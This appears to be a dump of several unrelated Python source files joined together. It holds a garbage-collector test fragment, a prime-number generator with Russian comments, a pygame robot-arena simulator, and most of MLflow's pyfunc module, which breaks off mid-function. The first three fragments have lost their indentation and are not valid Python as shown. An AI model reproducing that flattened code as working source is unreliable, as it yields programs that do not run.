# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
primes.py | # Набор функций для генерации простых чисел заданной длины.
import random
import multiprocessing
import math
global_primes_list = [] # хранение списка простых чисел
CHECK_STEPS = 100 # раундов для проверки Ферма
ERATO_PRIMES = 1000 # до какого протого числа делать решето
def write_to_file():
file = open("primes.txt", "w")
file.write(str(ERATO_PRIMES) + "\n")
file.writelines(str(global_primes_list))
file.close()
def read_from_file():
global global_primes_list
out = []
file = open("primes.txt", "r")
n = file.readlines()[1]
f = n[1:-1].split(", ")
for i in f:
out.append(int(i))
global_primes_list = out
def get_prime_list():
try:
primes_file = open("primes.txt", "r")
primes_in_file = primes_file.readlines()[0]
primes_file.close()
except(IOError, IndexError):
print(u"Файл с простыми не найден, создаем")
eratosthenes()
write_to_file()
return
if int(primes_in_file) != ERATO_PRIMES:
print(u"Файл найден, но чисел не столько сколько надо")
eratosthenes()
write_to_file()
return
read_from_file()
def eratosthenes():
primes = []
multiples = []
for i in range(2, ERATO_PRIMES+1):
if i not in multiples:
primes.append(i)
multiples.extend(range(i*i, ERATO_PRIMES+1, i))
global global_primes_list
global_primes_list = primes
print(global_primes_list)
def check_with_primes(number):
for prime in global_primes_list:
if number % prime == 0:
#print(u"+", end='', flush=True)
return False
return True
def test_fermat(number):
for i in range(CHECK_STEPS):
a = random.randint(2, number)
if pow(a, number-1, number) != 1:
#print(u"-", end='', flush=True)
return False
return True
# def generate_prime_threads(len, threads):
def generate_prime(length, cycles=1000000):
for i in range(cycles):
n = random.randint(2 ** (length-1), 2 ** length)
if check_with_primes(n) is True and test_fermat(n) is True:
# print("\n")
# print(u"Вышло.")
# print(n)
# print(u"................")
return n
# print(u"Не вышло.")
return -1
def generate_prime_threads(length, threads_c):
q = multiprocessing.Queue()
a_stop_event = multiprocessing.Event()
def generate_key_thread(length):
while not a_stop_event.is_set():
a = generate_prime(length, 1)
if a > 0:
q.put(a)
return
q.empty()
a_stop_event.clear()
threads = [multiprocessing.Process(target=generate_key_thread, args=(length,)) for i in range(threads_c)]
for th in threads:
th.start()
result = q.get()
a_stop_event.set()
for th in threads:
th.join()
print("")
pretty_print_prime(length, result)
return result
def generate_prime_range(start, stop):
cycles = 1000000
for i in range(cycles):
n = random.randint(start, stop)
if check_with_primes(n) is True and test_fermat(n) is True:
print("\n", flush=True)
return n
def pretty_print_prime(length, number):
side = math.sqrt(length)
if not side.is_integer():
return
side = int(side/2)
encoded = encodeN(number, 16)
print("+" + "-"*side + "+")
for i in range(side):
print("|" + encoded[i*side:(i+1)*side] + "|")
print("+" + "-"*int(side) + "+")
def encodeN(n,N,D="1234567890ABCDEF"):
return (encodeN(n//N,N)+D[n%N]).lstrip("0") if n>0 else "0"
|
simulator.py | from __future__ import division
import threading
import pygame
from .arenas import PiratePlunderArena, CTFArena, SunnySideUpArena, ABCArena, CalderaArena, TwoColoursArena
from .display import Display
DEFAULT_GAME = 'caldera'
GAMES = {'caldera': CalderaArena,
'pirate-plunder': PiratePlunderArena,
'ctf': CTFArena,
'sunny-side-up': SunnySideUpArena,
'abc': ABCArena,
'two-colours': TwoColoursArena,
}
class Simulator(object):
def __init__(self, config={}, size=(8, 8), frames_per_second=30, background=True):
try:
game_name = config['game']
del config['game']
except KeyError:
game_name = DEFAULT_GAME
game = GAMES[game_name]
self.arena = game(**config)
self.display = Display(self.arena)
self.background = background
self.frames_per_second = frames_per_second
if self.background:
self._loop_thread = threading.Thread(target=self._main_loop, args=(frames_per_second,))
self._loop_thread.setDaemon(True)
self._loop_thread.start()
def run(self):
if self.background:
raise RuntimeError('Simulator runs in the background. Try passing background=False')
self._main_loop(self.frames_per_second)
def _main_loop(self, frames_per_second):
clock = pygame.time.Clock()
while True:
if any(event.type == pygame.QUIT
or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE)
for event in pygame.event.get()):
break
self.display.tick(1/frames_per_second)
clock.tick(frames_per_second)
pygame.quit()
|
__init__.py | """
The ``python_function`` model flavor serves as a default model interface for MLflow Python models.
Any MLflow Python model is expected to be loadable as a ``python_function`` model.
In addition, the ``mlflow.pyfunc`` module defines a generic :ref:`filesystem format
<pyfunc-filesystem-format>` for Python models and provides utilities for saving to and loading from
this format. The format is self contained in the sense that it includes all necessary information
for anyone to load it and use it. Dependencies are either stored directly with the model or
referenced via a Conda environment.
The ``mlflow.pyfunc`` module also defines utilities for creating custom ``pyfunc`` models
using frameworks and inference logic that may not be natively included in MLflow. See
:ref:`pyfunc-create-custom`.
.. _pyfunc-inference-api:
*************
Inference API
*************
Python function models are loaded as an instance of :py:class:`PyFuncModel
<mlflow.pyfunc.PyFuncModel>`, which is an MLflow wrapper around the model implementation and model
metadata (MLmodel file). You can score the model by calling the :py:func:`predict()
<mlflow.pyfunc.PyFuncModel.predict>` method, which has the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray, scipy.sparse.(csc.csc_matrix | csr.csr_matrix),
List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
All PyFunc models will support `pandas.DataFrame` as input and DL PyFunc models will also support
tensor inputs in the form of Dict[str, numpy.ndarray] (named tensors) and `numpy.ndarrays`
(unnamed tensors).
.. _pyfunc-filesystem-format:
*****************
Filesystem format
*****************
The Pyfunc format is defined as a directory structure containing all required data, code, and
configuration::
./dst-path/
./MLmodel: configuration
<code>: code packaged with the model (specified in the MLmodel file)
<data>: data packaged with the model (specified in the MLmodel file)
<env>: Conda environment definition (specified in the MLmodel file)
The directory structure may contain additional contents that can be referenced by the ``MLmodel``
configuration.
.. _pyfunc-model-config:
MLModel configuration
#####################
A Python model contains an ``MLmodel`` file in **python_function** format in its root with the
following parameters:
- loader_module [required]:
Python module that can load the model. Expected as module identifier
e.g. ``mlflow.sklearn``, it will be imported using ``importlib.import_module``.
The imported module must contain a function with the following signature::
_load_pyfunc(path: string) -> <pyfunc model implementation>
The path argument is specified by the ``data`` parameter and may refer to a file or
directory. The model implementation is expected to be an object with a
``predict`` method with the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
- code [optional]:
Relative path to a directory containing the code packaged with this model.
All files and directories inside this directory are added to the Python path
prior to importing the model loader.
- data [optional]:
Relative path to a file or directory containing model data.
The path is passed to the model loader.
- env [optional]:
Relative path to an exported Conda environment. If present this environment
should be activated prior to running the model.
- Optionally, any additional parameters necessary for interpreting the serialized model in
``pyfunc`` format.
.. rubric:: Example
::
tree example/sklearn_iris/mlruns/run1/outputs/linear-lr
::
├── MLmodel
├── code
│ ├── sklearn_iris.py
│
├── data
│ └── model.pkl
└── mlflow_env.yml
::
cat example/sklearn_iris/mlruns/run1/outputs/linear-lr/MLmodel
::
python_function:
code: code
data: data/model.pkl
loader_module: mlflow.sklearn
env: mlflow_env.yml
main: sklearn_iris
.. _pyfunc-create-custom:
******************************
Creating custom Pyfunc models
******************************
MLflow's persistence modules provide convenience functions for creating models with the
``pyfunc`` flavor in a variety of machine learning frameworks (scikit-learn, Keras, Pytorch, and
more); however, they do not cover every use case. For example, you may want to create an MLflow
model with the ``pyfunc`` flavor using a framework that MLflow does not natively support.
Alternatively, you may want to build an MLflow model that executes custom logic when evaluating
queries, such as preprocessing and postprocessing routines. Therefore, ``mlflow.pyfunc``
provides utilities for creating ``pyfunc`` models from arbitrary code and model data.
The :meth:`save_model()` and :meth:`log_model()` methods are designed to support multiple workflows
for creating custom ``pyfunc`` models that incorporate custom inference logic and artifacts
that the logic may require.
An `artifact` is a file or directory, such as a serialized model or a CSV. For example, a
serialized TensorFlow graph is an artifact. An MLflow model directory is also an artifact.
.. _pyfunc-create-custom-workflows:
Workflows
#########
:meth:`save_model()` and :meth:`log_model()` support the following workflows:
1. Programmatically defining a new MLflow model, including its attributes and artifacts.
Given a set of artifact URIs, :meth:`save_model()` and :meth:`log_model()` can
automatically download artifacts from their URIs and create an MLflow model directory.
In this case, you must define a Python class which inherits from :class:`~PythonModel`,
defining ``predict()`` and, optionally, ``load_context()``. An instance of this class is
specified via the ``python_model`` parameter; it is automatically serialized and deserialized
as a Python class, including all of its attributes.
2. Interpreting pre-existing data as an MLflow model.
If you already have a directory containing model data, :meth:`save_model()` and
:meth:`log_model()` can import the data as an MLflow model. The ``data_path`` parameter
specifies the local filesystem path to the directory containing model data.
In this case, you must provide a Python module, called a `loader module`. The
loader module defines a ``_load_pyfunc()`` method that performs the following tasks:
- Load data from the specified ``data_path``. For example, this process may include
deserializing pickled Python objects or models or parsing CSV files.
- Construct and return a pyfunc-compatible model wrapper. As in the first
use case, this wrapper must define a ``predict()`` method that is used to evaluate
queries. ``predict()`` must adhere to the :ref:`pyfunc-inference-api`.
The ``loader_module`` parameter specifies the name of your loader module.
For an example loader module implementation, refer to the `loader module
implementation in mlflow.keras <https://github.com/mlflow/mlflow/blob/
74d75109aaf2975f5026104d6125bb30f4e3f744/mlflow/keras.py#L157-L187>`_.
.. _pyfunc-create-custom-selecting-workflow:
Which workflow is right for my use case?
########################################
We consider the first workflow to be more user-friendly and generally recommend it for the
following reasons:
- It automatically resolves and collects specified model artifacts.
- It automatically serializes and deserializes the ``python_model`` instance and all of
its attributes, reducing the amount of user logic that is required to load the model
- You can create Models using logic that is defined in the ``__main__`` scope. This allows
custom models to be constructed in interactive environments, such as notebooks and the Python
REPL.
You may prefer the second, lower-level workflow for the following reasons:
- Inference logic is always persisted as code, rather than a Python object. This makes logic
easier to inspect and modify later.
- If you have already collected all of your model data in a single location, the second
workflow allows it to be saved in MLflow format directly, without enumerating constituent
artifacts.
"""
import importlib
import tempfile
import signal
import sys
import numpy as np
import os
import pandas
import yaml
from copy import deepcopy
import logging
import threading
import collections
import subprocess
from typing import Any, Union, List, Dict, Iterator, Tuple
import mlflow
import mlflow.pyfunc.model
from mlflow.models import Model, ModelSignature, ModelInputExample
from mlflow.models.model import MLMODEL_FILE_NAME
from mlflow.models.utils import _save_example
from mlflow.pyfunc.model import ( # pylint: disable=unused-import
PythonModel,
PythonModelContext,
get_default_conda_env,
)
from mlflow.pyfunc.model import get_default_pip_requirements
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.types import DataType, Schema, TensorSpec
from mlflow.types.utils import clean_tensor_type
from mlflow.utils import PYTHON_VERSION, get_major_minor_py_version
from mlflow.utils.annotations import deprecated
from mlflow.utils.file_utils import _copy_file_or_tree, write_to
from mlflow.utils.model_utils import (
_get_flavor_configuration,
_validate_and_copy_code_paths,
_add_code_from_conf_to_system_path,
_get_flavor_configuration_from_uri,
_validate_and_prepare_target_save_path,
)
from mlflow.utils.uri import append_to_uri_path
from mlflow.utils.environment import (
_EnvManager,
_validate_env_arguments,
_process_pip_requirements,
_process_conda_env,
_CONDA_ENV_FILE_NAME,
_REQUIREMENTS_FILE_NAME,
_CONSTRAINTS_FILE_NAME,
)
from mlflow.utils.docstring_utils import format_docstring, LOG_MODEL_PARAM_DOCS
from mlflow.utils.databricks_utils import is_in_databricks_runtime
from mlflow.utils.file_utils import get_or_create_tmp_dir, get_or_create_nfs_tmp_dir
from mlflow.utils.process import cache_return_value_per_process
from mlflow.exceptions import MlflowException
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from mlflow.protos.databricks_pb2 import (
INVALID_PARAMETER_VALUE,
RESOURCE_DOES_NOT_EXIST,
)
from scipy.sparse import csc_matrix, csr_matrix
from mlflow.utils.requirements_utils import (
_check_requirement_satisfied,
_parse_requirements,
)
from mlflow.utils import find_free_port
from mlflow.utils.nfs_on_spark import get_nfs_cache_root_dir
# Name of this flavor as stored in the MLmodel configuration file.
FLAVOR_NAME = "python_function"
# Keys of the pyfunc flavor configuration (see the module docstring).
MAIN = "loader_module"  # module whose _load_pyfunc() loads the model
CODE = "code"  # optional model-relative path to packaged code
DATA = "data"  # optional model-relative path to model data
ENV = "env"  # optional model-relative path to a Conda environment file
PY_VERSION = "python_version"  # Python version the model was saved with
_logger = logging.getLogger(__name__)
# Input/output types accepted and produced by PyFuncModel.predict().
PyFuncInput = Union[pandas.DataFrame, np.ndarray, csc_matrix, csr_matrix, List[Any], Dict[str, Any]]
PyFuncOutput = Union[pandas.DataFrame, pandas.Series, np.ndarray, list]
def add_to_model(model, loader_module, data=None, code=None, env=None, **kwargs):
    """
    Attach a ``pyfunc`` flavor specification to an existing model configuration.

    Defines the ``pyfunc`` configuration schema. Callers can use this to turn an
    existing directory structure into a valid ``pyfunc`` model; other model
    flavors can use it to describe how their output is consumable as a ``pyfunc``.

    NOTE: all paths are relative to the exported model root directory.

    :param model: Existing model.
    :param loader_module: The module to be used to load the model.
    :param data: Path to the model data.
    :param code: Path to the code dependencies.
    :param env: Conda environment.
    :param kwargs: Additional key-value pairs to include in the ``pyfunc`` flavor
                   specification. Values must be YAML-serializable.
    :return: Updated model configuration.
    """
    # Deep-copy the extras so later mutation of params never leaks back to kwargs.
    params = deepcopy(kwargs)
    params.update({MAIN: loader_module, PY_VERSION: PYTHON_VERSION})
    # Record only the optional entries that were actually provided.
    for key, value in ((CODE, code), (DATA, data), (ENV, env)):
        if value:
            params[key] = value
    return model.add_flavor(FLAVOR_NAME, **params)
def _load_model_env(path):
    """
    Return the ENV entry from a model configuration stored in python_function
    format: a model-relative path to a Conda environment file, or None when no
    environment was recorded at model save time.
    """
    flavor_conf = _get_flavor_configuration(model_path=path, flavor_name=FLAVOR_NAME)
    return flavor_conf.get(ENV)
def _enforce_mlflow_datatype(name, values: pandas.Series, t: DataType):
    """
    Enforce the input column type matches the declared in model input schema.

    The following type conversions are allowed:
    1. object -> string
    2. int -> long (upcast)
    3. float -> double (upcast)
    4. int -> double (safe conversion)
    5. np.datetime64[x] -> datetime (any precision)
    6. object -> datetime

    Any other type mismatch will raise error.

    :param name: Column name, used only in error messages.
    :param values: The input column.
    :param t: The MLflow DataType declared for this column in the input schema.
    :return: The (possibly converted) column.
    :raises MlflowException: if the column cannot be safely converted to ``t``.
    """
    if values.dtype == object and t not in (DataType.binary, DataType.string):
        # Let pandas infer a concrete dtype first so the checks below can match it.
        values = values.infer_objects()
    if t == DataType.string and values.dtype == object:
        # NB: the object can contain any type and we currently cannot cast to pandas Strings
        # due to how None is cast
        return values

    # NB: Comparison of pandas and numpy data type fails when numpy data type is on the left hand
    # side of the comparison operator. It works, however, if pandas type is on the left hand side.
    # That is because pandas is aware of numpy.
    if t.to_pandas() == values.dtype or t.to_numpy() == values.dtype:
        # The types are already compatible => conversion is not necessary.
        return values

    if t == DataType.binary and values.dtype.kind == t.binary.to_numpy().kind:
        # NB: bytes in numpy have variable itemsize depending on the length of the longest
        # element in the array (column). Since MLflow binary type is length agnostic, we ignore
        # itemsize when matching binary columns.
        return values

    if t == DataType.datetime and values.dtype.kind == t.to_numpy().kind:
        # NB: datetime values have variable precision denoted by brackets, e.g. datetime64[ns]
        # denotes nanosecond precision. Since MLflow datetime type is precision agnostic, we
        # ignore precision when matching datetime columns.
        return values

    if t == DataType.datetime and values.dtype == object:
        # NB: Pyspark date columns get converted to object when converted to a pandas
        # DataFrame. To respect the original typing, we convert the column to datetime.
        try:
            return values.astype(np.datetime64, errors="raise")
        except ValueError:
            raise MlflowException(
                "Failed to convert column {0} from type {1} to {2}.".format(name, values.dtype, t)
            )

    numpy_type = t.to_numpy()
    if values.dtype.kind == numpy_type.kind:
        # Same kind (e.g. int -> int): widening within the kind is safe.
        is_upcast = values.dtype.itemsize <= numpy_type.itemsize
    elif values.dtype.kind == "u" and numpy_type.kind == "i":
        # Unsigned -> signed is safe only when the signed type is strictly wider.
        is_upcast = values.dtype.itemsize < numpy_type.itemsize
    elif values.dtype.kind in ("i", "u") and numpy_type == np.float64:
        # allow (u)int => double conversion
        # NOTE(review): the 6-byte cutoff presumably keeps integers within the
        # 52-bit float64 mantissa so the conversion stays exact — confirm intent.
        is_upcast = values.dtype.itemsize <= 6
    else:
        is_upcast = False

    if is_upcast:
        return values.astype(numpy_type, errors="raise")
    else:
        # NB: conversion between incompatible types (e.g. floats -> ints or
        # double -> float) are not allowed. While supported by pandas and numpy,
        # these conversions alter the values significantly.
        def all_ints(xs):
            # True when every non-null element is a whole number.
            return all(pandas.isnull(x) or int(x) == x for x in xs)

        hint = ""
        if (
            values.dtype == np.float64
            and numpy_type.kind in ("i", "u")
            and values.hasnans
            and all_ints(values)
        ):
            # Whole-number floats + NaNs strongly suggest an int column that pandas
            # promoted to float because of missing values; surface the known fix.
            hint = (
                " Hint: the type mismatch is likely caused by missing values. "
                "Integer columns in python can not represent missing values and are therefore "
                "encoded as floats. The best way to avoid this problem is to infer the model "
                "schema based on a realistic data sample (training dataset) that includes missing "
                "values. Alternatively, you can declare integer columns as doubles (float64) "
                "whenever these columns may have missing values. See `Handling Integers With "
                "Missing Values <https://www.mlflow.org/docs/latest/models.html#"
                "handling-integers-with-missing-values>`_ for more details."
            )

        raise MlflowException(
            "Incompatible input types for column {0}. "
            "Can not safely convert {1} to {2}.{3}".format(name, values.dtype, numpy_type, hint)
        )
def _enforce_tensor_spec(
    values: Union[np.ndarray, csc_matrix, csr_matrix], tensor_spec: TensorSpec
):
    """
    Enforce that the input tensor's shape and dtype match the provided tensor spec.

    A ``-1`` entry in the spec's shape is a wildcard matching any size for that
    dimension (e.g. a variable-length batch dimension).

    :param values: Dense numpy array or scipy CSC/CSR sparse matrix to validate.
    :param tensor_spec: Tensor spec from the model's input signature.
    :return: ``values`` unchanged, when it conforms to the spec.
    :raises MlflowException: if the rank, a fixed dimension, or the dtype differs.
    """
    expected_shape = tensor_spec.shape
    actual_shape = values.shape
    # Sparse matrices expose their element dtype via the underlying .data array.
    actual_type = values.dtype if isinstance(values, np.ndarray) else values.data.dtype

    rank_matches = len(expected_shape) == len(actual_shape)
    dims_match = rank_matches and all(
        expected in (-1, actual)
        for expected, actual in zip(expected_shape, actual_shape)
    )
    if not dims_match:
        raise MlflowException(
            "Shape of input {0} does not match expected shape {1}.".format(
                actual_shape, expected_shape
            )
        )
    if clean_tensor_type(actual_type) != tensor_spec.type:
        raise MlflowException(
            "dtype of input {0} does not match expected dtype {1}".format(
                values.dtype, tensor_spec.type
            )
        )
    return values
def _enforce_col_schema(pfInput: PyFuncInput, input_schema: Schema):
    """Enforce the input columns conform to the model's column-based signature."""
    if input_schema.has_input_names():
        input_names = input_schema.input_names()
    else:
        # Unnamed schema: take the first len(inputs) columns positionally.
        input_names = pfInput.columns[: len(input_schema.inputs)]
    declared_types = input_schema.input_types()
    # Rebuild the frame column by column, coercing each to its declared type.
    result = pandas.DataFrame()
    for col_name, col_type in zip(input_names, declared_types):
        result[col_name] = _enforce_mlflow_datatype(col_name, pfInput[col_name], col_type)
    return result
def _enforce_tensor_schema(pfInput: PyFuncInput, input_schema: Schema):
    """Enforce the input tensor(s) conforms to the model's tensor-based signature."""
    if not input_schema.has_input_names():
        # Unnamed signature: exactly one tensor spec is expected.
        if isinstance(pfInput, pandas.DataFrame):
            return _enforce_tensor_spec(pfInput.to_numpy(), input_schema.inputs[0])
        if isinstance(pfInput, (np.ndarray, csc_matrix, csr_matrix)):
            return _enforce_tensor_spec(pfInput, input_schema.inputs[0])
        raise MlflowException(
            "This model contains a tensor-based model signature with no input names,"
            " which suggests a numpy array input, but an input of type {0} was"
            " found.".format(type(pfInput))
        )

    # Named signature: validate each named tensor against its spec.
    named_specs = list(zip(input_schema.input_names(), input_schema.inputs))
    if isinstance(pfInput, dict):
        new_pfInput = {}
        for col_name, tensor_spec in named_specs:
            if not isinstance(pfInput[col_name], np.ndarray):
                raise MlflowException(
                    "This model contains a tensor-based model signature with input names,"
                    " which suggests a dictionary input mapping input name to a numpy"
                    " array, but a dict with value type {0} was found.".format(
                        type(pfInput[col_name])
                    )
                )
            new_pfInput[col_name] = _enforce_tensor_spec(pfInput[col_name], tensor_spec)
    elif isinstance(pfInput, pandas.DataFrame):
        # Convert each column to an array of the spec's dtype before validating.
        new_pfInput = {
            col_name: _enforce_tensor_spec(
                np.array(pfInput[col_name], dtype=tensor_spec.type), tensor_spec
            )
            for col_name, tensor_spec in named_specs
        }
    else:
        raise MlflowException(
            "This model contains a tensor-based model signature with input names, which"
            " suggests a dictionary input mapping input name to tensor, but an input of"
            " type {0} was found.".format(type(pfInput))
        )
    return new_pfInput
def _enforce_schema(pfInput: PyFuncInput, input_schema: Schema):
    """
    Enforces the provided input matches the model's input schema,

    For signatures with input names, we check there are no missing inputs and reorder the inputs to
    match the ordering declared in schema if necessary. Any extra columns are ignored.

    For column-based signatures, we make sure the types of the input match the type specified in
    the schema or if it can be safely converted to match the input schema.

    For tensor-based signatures, we make sure the shape and type of the input matches the shape
    and type specified in model's input schema.

    :param pfInput: Raw model input (DataFrame, ndarray, sparse matrix, list or dict).
    :param input_schema: The model's declared input schema.
    :return: The sanitized input, ready to be passed to the model implementation.
    :raises MlflowException: when the input cannot be matched against the schema.
    """
    if not input_schema.is_tensor_spec():
        # Column-based signature: coerce list/ndarray/dict inputs to a DataFrame first.
        if isinstance(pfInput, (list, np.ndarray, dict)):
            try:
                pfInput = pandas.DataFrame(pfInput)
            except Exception as e:
                raise MlflowException(
                    "This model contains a column-based signature, which suggests a DataFrame"
                    " input. There was an error casting the input data to a DataFrame:"
                    " {0}".format(str(e))
                )
        if not isinstance(pfInput, pandas.DataFrame):
            raise MlflowException(
                "Expected input to be DataFrame or list. Found: %s" % type(pfInput).__name__
            )
    if input_schema.has_input_names():
        # make sure there are no missing columns
        input_names = input_schema.input_names()
        expected_cols = set(input_names)
        actual_cols = set()
        if len(expected_cols) == 1 and isinstance(pfInput, np.ndarray):
            # for schemas with a single column, match input with column
            # (pfInput can only still be an ndarray here for tensor specs, since
            # column-based inputs were converted to a DataFrame above)
            pfInput = {input_names[0]: pfInput}
            actual_cols = expected_cols
        elif isinstance(pfInput, pandas.DataFrame):
            actual_cols = set(pfInput.columns)
        elif isinstance(pfInput, dict):
            actual_cols = set(pfInput.keys())
        missing_cols = expected_cols - actual_cols
        extra_cols = actual_cols - expected_cols
        # Preserve order from the original columns, since missing/extra columns are likely to
        # be in same order.
        missing_cols = [c for c in input_names if c in missing_cols]
        extra_cols = [c for c in actual_cols if c in extra_cols]
        if missing_cols:
            raise MlflowException(
                "Model is missing inputs {0}."
                " Note that there were extra inputs: {1}".format(missing_cols, extra_cols)
            )
    elif not input_schema.is_tensor_spec():
        # The model signature does not specify column names => we can only verify column count.
        num_actual_columns = len(pfInput.columns)
        if num_actual_columns < len(input_schema.inputs):
            raise MlflowException(
                "Model inference is missing inputs. The model signature declares "
                "{0} inputs but the provided value only has "
                "{1} inputs. Note: the inputs were not named in the signature so we can "
                "only verify their count.".format(len(input_schema.inputs), num_actual_columns)
            )
    # Delegate per-column / per-tensor type enforcement to the matching helper.
    return (
        _enforce_tensor_schema(pfInput, input_schema)
        if input_schema.is_tensor_spec()
        else _enforce_col_schema(pfInput, input_schema)
    )
class PyFuncModel:
    """
    MLflow 'python function' model.

    Wrapper around a model implementation and its metadata. This class is not meant
    to be constructed directly; instances are created and returned by
    :py:func:`load_model() <mlflow.pyfunc.load_model>`.

    ``model_impl`` can be any Python object that implements the `Pyfunc interface
    <https://mlflow.org/docs/latest/python_api/mlflow.pyfunc.html#pyfunc-inference-api>`_,
    and is obtained by invoking the model's ``loader_module``.

    ``model_meta`` contains the model metadata loaded from the MLmodel file.
    """

    def __init__(self, model_meta: Model, model_impl: Any):
        # Validate both halves of the wrapper up front, so a broken loader is
        # reported at construction time instead of at the first predict() call.
        if not hasattr(model_impl, "predict"):
            raise MlflowException("Model implementation is missing required predict method.")
        if not model_meta:
            raise MlflowException("Model is missing metadata.")
        self._model_meta = model_meta
        self._model_impl = model_impl

    def predict(self, data: PyFuncInput) -> PyFuncOutput:
        """
        Generate model predictions.

        If the model contains a signature, the input schema is enforced first and
        the model implementation is called with the sanitized input. If the pyfunc
        model does not include a model schema, the input is passed through as is.
        See `Model Signature Enforcement
        <https://www.mlflow.org/docs/latest/models.html#signature-enforcement>`_
        for more details.

        :param data: Model input as one of pandas.DataFrame, numpy.ndarray,
                     scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], or
                     Dict[str, numpy.ndarray]
        :return: Model predictions as one of pandas.DataFrame, pandas.Series,
                 numpy.ndarray or list.
        """
        input_schema = self.metadata.get_input_schema()
        if input_schema is None:
            return self._model_impl.predict(data)
        return self._model_impl.predict(_enforce_schema(data, input_schema))

    @property
    def metadata(self):
        """Model metadata."""
        if self._model_meta is None:
            raise MlflowException("Model is missing metadata.")
        return self._model_meta

    def __repr__(self):
        info = {}
        meta = self._model_meta
        if meta is not None:
            if getattr(meta, "run_id", None) is not None:
                info["run_id"] = meta.run_id
            if getattr(meta, "artifact_path", None) is not None:
                info["artifact_path"] = meta.artifact_path
            info["flavor"] = meta.flavors[FLAVOR_NAME]["loader_module"]
        return yaml.safe_dump({"mlflow.pyfunc.loaded_model": info}, default_flow_style=False)
def _warn_dependency_requirement_mismatches(model_path):
    """
    Inspects the model's dependencies and prints a warning if the current Python
    environment doesn't satisfy them.
    """
    req_file_path = os.path.join(model_path, _REQUIREMENTS_FILE_NAME)
    if not os.path.exists(req_file_path):
        # Nothing to check: the model was saved without a requirements file.
        return
    try:
        # Collect a description for every requirement that the current
        # environment fails to satisfy.
        mismatch_infos = [
            str(info)
            for info in (
                _check_requirement_satisfied(req.req_str)
                for req in _parse_requirements(req_file_path, is_constraint=False)
            )
            if info is not None
        ]
        if mismatch_infos:
            mismatch_str = " - " + "\n - ".join(mismatch_infos)
            _logger.warning(
                "Detected one or more mismatches between the model's dependencies and the current "
                f"Python environment:\n{mismatch_str}\n"
                "To fix the mismatches, call `mlflow.pyfunc.get_model_dependencies(model_uri)` "
                "to fetch the model's environment and install dependencies using the resulting "
                "environment file."
            )
    except Exception as e:
        # Dependency checking is best-effort; never let it break model loading.
        _logger.warning(
            f"Encountered an unexpected error ({repr(e)}) while detecting model dependency "
            "mismatches. Set logging level to DEBUG to see the full traceback."
        )
        _logger.debug("", exc_info=True)
def load_model(
    model_uri: str, suppress_warnings: bool = False, dst_path: Union[str, None] = None
) -> PyFuncModel:
    """
    Load a model stored in Python function format.

    :param model_uri: The location, in URI format, of the MLflow model. For example:

                      - ``/Users/me/path/to/local/model``
                      - ``relative/path/to/local/model``
                      - ``s3://my_bucket/path/to/model``
                      - ``runs:/<mlflow_run_id>/run-relative/path/to/model``
                      - ``models:/<model_name>/<model_version>``
                      - ``models:/<model_name>/<stage>``
                      - ``mlflow-artifacts:/path/to/model``

                      For more information about supported URI schemes, see
                      `Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
                      artifact-locations>`_.
    :param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
                              loading process will be suppressed. If ``False``, these warning
                              messages will be emitted.
    :param dst_path: The local filesystem path to which to download the model artifact.
                     This directory must already exist. If unspecified, a local output
                     path will be created.
    :return: A :py:class:`PyFuncModel` wrapping the loaded implementation and metadata.
    """
    # Resolve the URI to a local directory, downloading remote artifacts if needed.
    local_path = _download_artifact_from_uri(artifact_uri=model_uri, output_path=dst_path)
    if not suppress_warnings:
        # Best-effort check that this environment satisfies the model's requirements.
        _warn_dependency_requirement_mismatches(local_path)
    model_meta = Model.load(os.path.join(local_path, MLMODEL_FILE_NAME))
    conf = model_meta.flavors.get(FLAVOR_NAME)
    if conf is None:
        raise MlflowException(
            'Model does not have the "{flavor_name}" flavor'.format(flavor_name=FLAVOR_NAME),
            RESOURCE_DOES_NOT_EXIST,
        )
    model_py_version = conf.get(PY_VERSION)
    if not suppress_warnings:
        # Warn when the saving and running Python major/minor versions differ.
        _warn_potentially_incompatible_py_version_if_necessary(model_py_version=model_py_version)
    # Make any code packaged with the model importable before loading it.
    _add_code_from_conf_to_system_path(local_path, conf, code_key=CODE)
    # The loader module receives the model data path, or the model root if none given.
    data_path = os.path.join(local_path, conf[DATA]) if (DATA in conf) else local_path
    model_impl = importlib.import_module(conf[MAIN])._load_pyfunc(data_path)
    return PyFuncModel(model_meta=model_meta, model_impl=model_impl)
def _download_model_conda_env(model_uri):
    """Download the model's conda environment file and return its local path."""
    flavor_conf = _get_flavor_configuration_from_uri(model_uri, FLAVOR_NAME)
    conda_env_uri = append_to_uri_path(model_uri, flavor_conf[ENV])
    return _download_artifact_from_uri(conda_env_uri)
def _get_model_dependencies(model_uri, format="pip"):  # pylint: disable=redefined-builtin
    """
    Fetch the model's dependency file and return its local filesystem path.

    For ``format="pip"``, the model's requirements file is downloaded; if that
    download fails, the "pip" section of the model's conda.yaml is extracted into
    a temporary requirements file instead (other conda dependencies are dropped
    with a warning). For ``format="conda"``, the conda.yaml file is downloaded.

    :raises MlflowException: if ``format`` is unknown, or when falling back to
        conda.yaml and it contains no pip section.
    """
    if format == "pip":
        req_file_uri = append_to_uri_path(model_uri, _REQUIREMENTS_FILE_NAME)
        try:
            return _download_artifact_from_uri(req_file_uri)
        except Exception as e:
            # fallback to download conda.yaml file and parse the "pip" section from it.
            _logger.info(
                f"Downloading model '{_REQUIREMENTS_FILE_NAME}' file failed, error is {repr(e)}. "
                "Falling back to fetching pip requirements from the model's 'conda.yaml' file. "
                "Other conda dependencies will be ignored."
            )
            conda_yml_path = _download_model_conda_env(model_uri)
            with open(conda_yml_path, "r") as yf:
                conda_yml = yaml.safe_load(yf)
            conda_deps = conda_yml.get("dependencies", [])
            # Locate the {"pip": [...]} entry inside the conda dependency list;
            # the for/else raises when no such entry exists.
            for index, dep in enumerate(conda_deps):
